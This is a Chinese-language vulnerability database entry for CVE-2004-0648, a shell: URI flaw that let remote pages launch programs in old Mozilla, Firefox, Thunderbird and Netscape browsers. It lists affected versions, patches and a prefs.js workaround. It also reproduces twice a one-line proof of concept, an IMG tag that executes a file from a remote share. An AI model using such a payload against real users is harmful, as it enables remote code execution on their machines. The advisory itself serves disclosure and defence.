CVE-2004-0648
CVSS10.0
发布时间 :2004-08-06 00:00:00
修订时间 :2016-10-17 22:47:12
NMCOES    

[原文]Mozilla (Suite) before 1.7.1, Firefox before 0.9.2, and Thunderbird before 0.7.2 allow remote attackers to launch arbitrary programs via a URI referencing the shell: protocol.


[CNNVD]Mozilla外部协议处理器安全漏洞(CNNVD-200408-103)

        
        Mozilla是一款流行的WEB浏览器。
        Mozilla Internet浏览器外部协议实现存在问题,远程攻击者可以利用这个漏洞以用户浏览器进程权限在系统上执行任意命令。
        Mozilla Internet浏览器允许无用户交互调用外部协议,攻击者可以调用'shell:' URI,诱使Mozilla浏览器解析,可导致任意的代码执行。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:mozilla:firefox:0.9.2Mozilla Firefox 0.9.2
cpe:/a:mozilla:mozilla:1.7.1Mozilla Mozilla 1.7.1
cpe:/a:mozilla:thunderbird:0.7.2Mozilla Thunderbird 0.7.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0648
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0648
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-103
(官方数据源) CNNVD

- 其它链接及资源

http://lists.grok.org.uk/pipermail/full-disclosure/2004-July/023573.html
(UNKNOWN)  FULLDISC  20040707 shell:windows command question
http://marc.info/?l=bugtraq&m=108938712815719&w=2
(UNKNOWN)  BUGTRAQ  20040708 Mozilla Security Advisory 2004-07-08
http://www.ciac.org/ciac/bulletins/o-175.shtml
(UNKNOWN)  CIAC  O-175
http://www.kb.cert.org/vuls/id/927014
(VENDOR_ADVISORY)  CERT-VN  VU#927014
http://www.mozilla.org/projects/security/known-vulnerabilities.html
(UNKNOWN)  CONFIRM  http://www.mozilla.org/projects/security/known-vulnerabilities.html
http://www.mozilla.org/security/shell.html
(UNKNOWN)  CONFIRM  http://www.mozilla.org/security/shell.html
http://xforce.iss.net/xforce/xfdb/16655
(VENDOR_ADVISORY)  XF  mozilla-shell-program-execution(16655)

- 漏洞信息

Mozilla外部协议处理器安全漏洞
危急 设计错误
2004-08-06 00:00:00 2005-10-20 00:00:00
远程  
        
        Mozilla是一款流行的WEB浏览器。
        Mozilla Internet浏览器外部协议实现存在问题,远程攻击者可以利用这个漏洞以用户浏览器进程权限在系统上执行任意命令。
        Mozilla Internet浏览器允许无用户交互调用外部协议,攻击者可以调用'shell:' URI,诱使Mozilla浏览器解析,可导致任意的代码执行。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在 prefs.js中增加如下行:
        user_pref("network.protocol-handler.external.shell", false);
        厂商补丁:
        Mozilla
        -------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        
        http://www.mozilla.org/security/shell.html

- 漏洞信息 (24263)

Mozilla 1.7 External Protocol Handler Weakness (EDBID:24263)
windows remote
2004-07-08 Verified
0 Keith McCanless
N/A [点击下载]
source: http://www.securityfocus.com/bid/10681/info

Mozilla Internet Browser is reported prone to a weakness that may permit an external protocol to be called without any user interaction. This may expose Mozilla users to vulnerabilities that exist in the underlying operating system or in the software that is the default handler for a registered protocol.

Vulnerabilities in the applications that are invoked by a protocol, and vulnerabilities in the way a called protocol is handled by the host operating system may be exploited using this weakness in the Mozilla browser.

1. VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED "X-6487ohu4s6x0p".
THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER AT "shell:NETHOOD"
2. VICTIM OPENS THIS HTML FILE WHICH EXECUTES A FILE NAMED "fileid.exe" IN THE
"shared" FOLDER:
<IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe">		

- 漏洞信息

59025
Netscape shell: URI Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

Netscape web browser contain a flaw that may allow a remote attacker to launch a program from a known location. The issue is triggered when rendering specially-crafted web page using the "shell:" command. This requires the attacker to trick a user into visiting the web page.

- 时间线

2004-07-08 Unknow
2004-07-08 Unknow

- 解决方案

Upgrade to Netscape 7.2 or higher as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the patch provided in the external references.

- 相关参考

- 漏洞作者

- 漏洞信息

Mozilla External Protocol Handler Weakness
Design Error 10681
Yes No
2004-07-08 12:00:00 2009-07-12 06:16:00
Discovery of this weakness is credited to Keith McCanless.

- 受影响的程序版本

Netscape Navigator 7.1
Netscape Navigator 7.0.2
Mozilla Thunderbird 0.7.1
Mozilla Thunderbird 0.7
Mozilla Firefox 0.9.1
Mozilla Firefox 0.9 rc
Mozilla Firefox 0.8
Mozilla Browser 1.7 rc3
Mozilla Browser 1.7
K-Meleon K-Meleon 0.8.2
Netscape Navigator 7.2
Mozilla Thunderbird 0.7.2
Mozilla Firefox 0.9.3
Mozilla Firefox 0.9.2
Mozilla Browser 1.8 Alpha 2
Mozilla Browser 1.7.2
Mozilla Browser 1.7.1
K-Meleon K-Meleon 0.9

- 不受影响的程序版本

Netscape Navigator 7.2
Mozilla Thunderbird 0.7.2
Mozilla Firefox 0.9.3
Mozilla Firefox 0.9.2
Mozilla Browser 1.8 Alpha 2
Mozilla Browser 1.7.2
Mozilla Browser 1.7.1
K-Meleon K-Meleon 0.9

- 漏洞讨论

Mozilla Internet Browser is reported prone to a weakness that may permit an external protocol to be called without any user interaction. This may expose Mozilla users to vulnerabilities that exist in the underlying operating system or in the software that is the default handler for a registered protocol.

Vulnerabilities in the applications that are invoked by a protocol, and vulnerabilities in the way a called protocol is handled by the host operating system may be exploited using this weakness in the Mozilla browser.

- 漏洞利用

There is no exploit required. Liu Die Yu has supplied a proof of concept for a 'shell:' URI remote file execution vector:
1. VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED "X-6487ohu4s6x0p".
THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER AT "shell:NETHOOD"
2. VICTIM OPENS THIS HTML FILE WHICH EXECUTES A FILE NAMED "fileid.exe" IN THE
"shared" FOLDER:
&lt;IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"&gt;

- 解决方案

K-Meleon version 0.9 is available to address this issue.

Mozilla has released a patch to address the "shell:" protocol handling weakness; it is available at the following location:
http://www.mozilla.org/security/shell.html

Mozilla has also released new versions of various browsers (Mozilla 1.7.1, Firefox 0.9.2, and Thunderbird 0.7.2) to address this issue.


Mozilla Thunderbird 0.7

Mozilla Thunderbird 0.7.1

Mozilla Firefox 0.8

K-Meleon K-Meleon 0.8.2

Mozilla Firefox 0.9 rc

Mozilla Firefox 0.9.1

Mozilla Browser 1.7 rc3

Mozilla Browser 1.7

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站